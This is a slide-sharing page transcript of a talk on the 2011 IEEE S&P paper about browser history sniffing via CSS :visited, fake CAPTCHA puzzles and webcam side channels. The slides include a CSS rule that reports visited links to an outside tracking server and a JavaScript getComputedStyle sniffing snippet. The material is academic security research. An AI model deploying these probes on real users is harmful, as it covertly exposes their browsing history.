Presentation is loading. Please wait.

Presentation is loading. Please wait.

Zachary Weinberg Eric Y. Chen Pavithra Ramesh Jayaraman Collin Jackson Carnegie Mellon University I Still Know What You Visited Last Summer I Still Know.

Published byEugene Eaton Modified over 9 years ago

Similar presentations

Presentation on theme: "Zachary Weinberg Eric Y. Chen Pavithra Ramesh Jayaraman Collin Jackson Carnegie Mellon University I Still Know What You Visited Last Summer I Still Know."— Presentation transcript:

1 Zachary Weinberg Eric Y. Chen Pavithra Ramesh Jayaraman Collin Jackson Carnegie Mellon University I Still Know What You Visited Last Summer I Still Know What You Visited Last Summer: User interaction and side-channel attacks on browsing history IEEE Symposium on Security and Privacy, May 2011

2 2

3 Outline 3 Introduction Automated Attacks Exp 1: Interactive Attacks Exp 2: Side-Channel Attacks Related Work Conclusion

4 Introduction 4 History Sniffing through CSS :visited  Andrew Clover, 2002, http://seclists.org/bugtraq/2002/Feb/271 http://seclists.org/bugtraq/2002/Feb/271 in HTML Visit Google! in CSS #link1:visited { color: red; background: url(http://140.115.53.28/track.php?url=google.com); }

5 Introduction 5 L. David Baron, 2010, http://dbaron.org/mozilla/visited-privacy http://dbaron.org/mozilla/visited-privacy  make getComputedStyle act as though all links are unvisitedgetComputedStyle  make certain CSS selectors act as though links are always unvisited  limits the CSS properties that can be used to style visited links to color, background-color, border-*-color, outline- color, column-rule-color, fill, and stroke The latest versions of Firefox, Chrome, Safari, and IE all adopt this defense  still vulnerable with interactive attacks

6 Introduction 6 Dongseok Jang et al., An Empirical Study of Privacy- Violating Information Flows in JavaScript Web ApplicationsAn Empirical Study of Privacy- Violating Information Flows in JavaScript Web Applications  Small sets of links (6~220) probed by real exploiters  46 popular websites, including one from Alexa Top100  This makes interactive attacks possible

7 Introduction 7 What can history sniffers do?  Benign:  Websites could use history sniffing to determine whether their users have visited known phishing sites.  Websites could seed visitors’ history with URLs made up for the purpose, and use the URLs to re-identify their visitors. Cookies  Malicious:  Track visitors across sites for advertising purpose, determining whether they also visit a site’s competitors.  Attackers can construct more targeted phishing pages, by impersonating only sites that a particular victim is known to visit

8 Automated Attacks 8 Direct sniffing a:visited { color: red; } var url_array = new Array('http://a.com', 'http://b.com'); var visited_array = new Array(); var link_el = document.createElement('a'); var computed_style = document.defaultView.getComputedStyle(link_el, ""); for (var i = 0; i < url_array.length; i++) { link_el.href = array[i]; if (computed_style.getPropertyValue("color") == 'rgb(255, 0, 0)'){ visited_array.push(url_array[i]); }

9 Automated Attacks 9 Indirect Sniffing  Make visited and unvisited links take different amounts of space, which causes unrelated elements on the page to move; inspect the positions of those other elements.  Make visited and unvisited links cause different images to load.  background-image style used in :visited rule  Not requires JavaScript

10 Automated Attacks 10 Side-channel sniffing  Timing attacks  the attacker can make the page take longer to lay out if a link is visited than if it is unvisited Transparent Underline Any other style rules in :visited Defense  Baron’s solution does well for all 3 types (direct/indirect/side- channel) above

11 Exp 1: Interactive Attacks 11 Require victims to interact with malicious sites  The authors claim that interactive attacks can be disguised as “normal” interactive tasks that users will not find surprising or suspicious Amazon’s Mechanical Turk  Recruit 307 participants All tasks in this experiment operate within the constraints of Baron’s defense  Visited-link styles only change the color on the screen  Pretend to be CAPTCHA tests  CAPTCHA: Completely Automated Public Turing test to tell Computers and Humans Apart

12 Exp 1: Interactive Attacks 12 1. Word CAPTCHA  Each word is a hyperlink to an URL that the attacker wishes to probe  If unvisited, it is drawn in the same color as the background.

13 Exp 1: Interactive Attacks 13 2. Character CAPTCHA  Seven-segment LCD symbols  Every letter represents 3 URLs  Site-supplied font

14 Exp 1: Interactive Attacks 14  4 + 5 = 9 ; 4 + F = A ; 5 + F = 6 ; 4 + 5 + F = 8  “ – “ is always-on

15 Exp 1: Interactive Attacks 15 3. Chessboard puzzle  Each square contains a URL  Only the pawns corresponding to visited sites are made visible  Using SVG or text to control the pawns

16 Exp 1: Interactive Attacks 16 4. Pattern matching puzzle

17 Exp 1: Interactive Attacks 17 Randomly generated task instances corresponding to known proportions of visited and unvisited links.

18 Exp 1: Interactive Attacks 18 Automated history-sniffing exploits on all the participants  URL set from wtikay.comwtikay.com  7012 commonly visited URLs (from Alexa Top 5000)

19 Exp 1: Interactive Attacks 19

20 Exp 1: Interactive Attacks 20

21 Exp 1: Interactive Attacks 21

22 Exp 1: Interactive Attacks 22

23 Exp 1: Interactive Attacks 23

24 Exp 2: Side-channel Attacks 24 Webcam attacks   Random 20 URLs with 10 visited ones  Variant 1:  Designed to comply with the WCAG standard for seizure safety  Variant 2:  Make entire browser window flash  Brighter color

25 Exp 2: Side-channel Attacks 25 Author test  100% accuracy for both variants in all condition  Will-lit room  Person stays still in front of the computer  In a dark room, accuracy dropped to 50% Field test  60 / 307 participants

26 Exp 2: Side-channel Attacks 26 Field test

27 Exp 2: Side-channel Attacks 27 In real life,  ChatRoulette service ChatRoulette The attack works even when the closest reflector is a wall 10 to 20 feet away from the monitor

28 Related Work 28 Page cache  Felten et al., Timing Attacks on Web Privacy DNS cache  Felten et al., Timing Attacks on Web Privacy Both tactics above  Only for the first time  Short-term history Loadable cross-origin but only available to logged-in users  Facebook, Gmail, Twitter, etc.  JavaScript onerror event

29 Related Work 29 Cookie, Flash Player local shared objects Ad-blocker, Private browsing mode

30 Conclusion 30 Automated history sniffing attacks have successfully been blocked by Baron’s solution Interactive attacks are not This paper developed POC of 6 history sniffing exploited against Baron’s defense  4 interactive attacks  2 detection of the screen through webcam

Download ppt "Zachary Weinberg Eric Y. Chen Pavithra Ramesh Jayaraman Collin Jackson Carnegie Mellon University I Still Know What You Visited Last Summer I Still Know."

Similar presentations

Protecting Browser State from Web Privacy Attacks Collin Jackson, Andrew Bortz, Dan Boneh, John Mitchell Stanford University.

Protecting Browser State from Web Privacy Attacks Collin Jackson, Andrew Bortz, Dan Boneh, John Mitchell Stanford University.
Introduction to CSS.

Introduction to CSS.
CSS Link Styling. The Anchor Element: Link text between the opening and closing can be styled using CSS. Some of the properties that can be set are: font-family,

CSS Link Styling. The Anchor Element: Link text between the opening and closing can be styled using CSS. Some of the properties that can be set are: font-family,
CSS BASICS. CSS Rules Components of a CSS Rule  Selector: Part of the rule that targets an element to be styled  Declaration: Two or more parts: a.

CSS BASICS. CSS Rules Components of a CSS Rule  Selector: Part of the rule that targets an element to be styled  Declaration: Two or more parts: a.
กระบวนวิชา 25 3208 CSS. What is CSS? CSS stands for Cascading Style Sheets Styles define how to display HTML elements Styles were added to HTML 4.0 to.

กระบวนวิชา CSS. What is CSS? CSS stands for Cascading Style Sheets Styles define how to display HTML elements Styles were added to HTML 4.0 to.
Introduction to CSS CSS Backgrounds - Fort Collins, CO Copyright © XTR Systems, LLC Cascading Style Sheets - Colors & Backgrounds Instructor: Joseph DiVerdi,

Introduction to CSS CSS Backgrounds - Fort Collins, CO Copyright © XTR Systems, LLC Cascading Style Sheets - Colors & Backgrounds Instructor: Joseph DiVerdi,
Protecting Browsers from Cross-Origin CSS Attacks Lin-Shung Huang, Zack Weinberg Carnegie Mellon University Chris Evans Google Collin Jackson Carnegie.

Protecting Browsers from Cross-Origin CSS Attacks Lin-Shung Huang, Zack Weinberg Carnegie Mellon University Chris Evans Google Collin Jackson Carnegie.
On the Privacy of Private Browsing Kiavash Satvat, Matt Forshaw, Feng Hao, Ehsan Toreini Newcastle University DPM’13.

On the Privacy of Private Browsing Kiavash Satvat, Matt Forshaw, Feng Hao, Ehsan Toreini Newcastle University DPM’13.
17 th ACM CCS (October, 2010).  Introduction  Threat Model  Cross-Origin CSS Attacks  Example Attacks  Defenses  Experiment  Related Work 2 A Presentation.

17 th ACM CCS (October, 2010).  Introduction  Threat Model  Cross-Origin CSS Attacks  Example Attacks  Defenses  Experiment  Related Work 2 A Presentation.
Password Managers: Attacks and Defenses David SilverSuman JanaDan Boneh Stanford University Eric ChenCollin Jackson Carnegie Mellon University Usenix Security.

Password Managers: Attacks and Defenses David SilverSuman JanaDan Boneh Stanford University Eric ChenCollin Jackson Carnegie Mellon University Usenix Security.
Understanding and Detecting Malicious Web Advertising

Understanding and Detecting Malicious Web Advertising
Mitigating Malware Collin Jackson CS142 – Winter 2009.

Mitigating Malware Collin Jackson CS142 – Winter 2009.
Password Managers: Attacks and Defenses David Silver, Suman Jana, Dan Boneh, Stanford University Eric Chen, Collin Jackson, Carnegie Mellon University.

Password Managers: Attacks and Defenses David Silver, Suman Jana, Dan Boneh, Stanford University Eric Chen, Collin Jackson, Carnegie Mellon University.
Hypertext Markup Language. Platform: - Independent  This means it can be interpreted on any computer regardless of the hardware or operating system.

Hypertext Markup Language. Platform: - Independent  This means it can be interpreted on any computer regardless of the hardware or operating system.
Relative and Absolute Relative Absolute.  In web-page design, a hyperlink (or link) is a reference to a document that the reader can directly follow,

Relative and Absolute Relative Absolute.  In web-page design, a hyperlink (or link) is a reference to a document that the reader can directly follow,
Design, Formatting, CSS, & Colors 27 February, 2011.

Design, Formatting, CSS, & Colors 27 February, 2011.
Introduction Testing is examining the project performance according to the specifications that have been agreed. This will include the robustness of the.

Introduction Testing is examining the project performance according to the specifications that have been agreed. This will include the robustness of the.
Macromedia Dreamweaver MX 2004 Design Professional Web Page DEVELOPING A.

Macromedia Dreamweaver MX 2004 Design Professional Web Page DEVELOPING A.
Context-Aware Phishing Attacks and Client-Side Defenses Collin Jackson Stanford University.

Context-Aware Phishing Attacks and Client-Side Defenses Collin Jackson Stanford University.
Create head content and set page properties Create, import, and format text Add links to Web pages Use the History panel and Code Inspector Modify and.

Create head content and set page properties Create, import, and format text Add links to Web pages Use the History panel and Code Inspector Modify and.

Similar presentations

Ads by Google